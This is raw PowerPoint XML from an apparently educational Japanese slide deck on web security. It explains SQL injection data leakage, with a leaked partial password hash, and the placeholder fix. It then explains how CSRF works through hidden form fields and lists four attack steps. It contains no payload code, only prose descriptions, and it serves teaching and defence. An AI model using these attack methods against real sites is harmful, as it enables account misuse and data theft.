        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE7C153-5A72-FA04-8A66-C0A9E17406B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685987" y="2365048"/>
            <a:ext cx="8820026" cy="3685981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="正方形/長方形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{370C32B1-5892-C027-F642-FE814F361C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2862470" y="5637475"/>
            <a:ext cx="3919993" cy="349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325D3FB9-0E67-5DFA-7F4A-3E479D9B279A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4822468" y="5987332"/>
            <a:ext cx="528761" cy="38968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221D530-306D-51FE-5590-57B9BB304B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351228" y="6176963"/>
            <a:ext cx="4288353" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>ハッシュ化されたパスワードの一部</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1970117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A8393-0C69-250C-7583-B8ACF2AE5AAE}"/>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9547FB9A-0725-BE7F-CEC4-E107162EF03A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>この場合、パスワードがハッシュ化されていたことと字数制限で元のパスワードも全く分からない形で出力されていたが、ハッシュ化せず平文の短いパスワードの場合はログインに必要な情報が出てくる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>特に管理者のユーザの情報が特定された場合他の情報にも簡単にアクセスできる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2946994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54AAF-8DBD-477F-9396-6FE7649D8CEF}"/>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E3B22D4D-6029-B7BA-DCB9-71DD59C36191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正ログイン同様、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の構文が変わってしまう事が</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションの原因であるためプレースホルダを用いて構文に変化が起きないようにする。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1720444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FEE57-6C11-B249-3814-1A5C1A8C2818}"/>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4CC8A3D4-08EC-4A6D-F0CE-064158ED0738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F858A2F3-25E7-F0A3-02E8-D102B6318ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477374" y="2285932"/>
            <a:ext cx="5237252" cy="4025968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3830595-7009-60BF-C9BC-9E5EBCF95D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044856" y="5128591"/>
            <a:ext cx="203132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プレースホルダを</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>使用する</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34346042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3FAC39-F4EC-AA28-48B6-E9AFAFD582A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクション</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F35E09-14DC-BBD9-CB3B-A26EA88C0EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>情報漏洩対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C2C4B6-4E68-52EF-3C27-05F4721DB094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2647251"/>
            <a:ext cx="4397998" cy="1814607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42351671-F016-D67C-A3B5-61557FFB3F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998597" y="2647251"/>
            <a:ext cx="4398566" cy="2034640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="正方形/長方形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C306794D-612D-296A-CA08-2E8E51BE7D97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9175805" y="4461858"/>
            <a:ext cx="755374" cy="2200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C39CA52-6720-64BA-9406-83E85C928675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236198" y="5245475"/>
            <a:ext cx="6405921" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「役職・立場」のところを見ると</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文含めてそのまま記録</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>されたことがわかる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>字数制限上途中まで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="コネクタ: カギ線 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D74AAF6-A3C1-7D58-DE13-517D580EFAE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="0"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="8714533" y="4406517"/>
            <a:ext cx="563584" cy="1114333"/>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778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47192B-85E3-D09D-973C-99F727265857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クロスサイトリクエストフォージェリ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD05748D-ED20-537D-B402-2E269377B070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザを不正に操作する攻撃手法の一つで、偽装した</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を開かせることにより利用者に意図せず特定のサイト上で何らかの操作を行わせるもの。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Cross Site Request Forgeries(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>略称：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C98528-DA5D-8AD1-6227-8AA2E74C9AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6176963"/>
            <a:ext cx="6094674" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：https://e-words.jp/w/CSRF.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1755624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5F3B4C-38DC-9D4E-D185-206E47BDA0CE}"/>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1ED12DE2-D8CC-820B-E6B9-3F985AE60F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でデータを送信する際に使用する</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>FORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグでは属性の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を指定する。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対象のサイトにログインしてセッションを持っている状態で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を対象の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に指定して送信内容を</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で隠しボタンを押すことでデータを不正送信する。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5061981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D2CC30-1E50-4808-78FA-C2D2E26F3721}"/>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E759C9CE-4BC0-85F3-A8A2-29F510ECB43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>攻撃の手順</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログインさせセッションを発行させる</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトに何らかの形でアクセスされる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイトのボタンをクリック</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セッション情報でアクセスされ攻撃者の意図したデータ送信がされる</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40072329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245B12-57AD-7AA4-448C-8C459F8BA255}"/>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2F86383E-0E93-B5F4-5B42-77ED62ED68E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
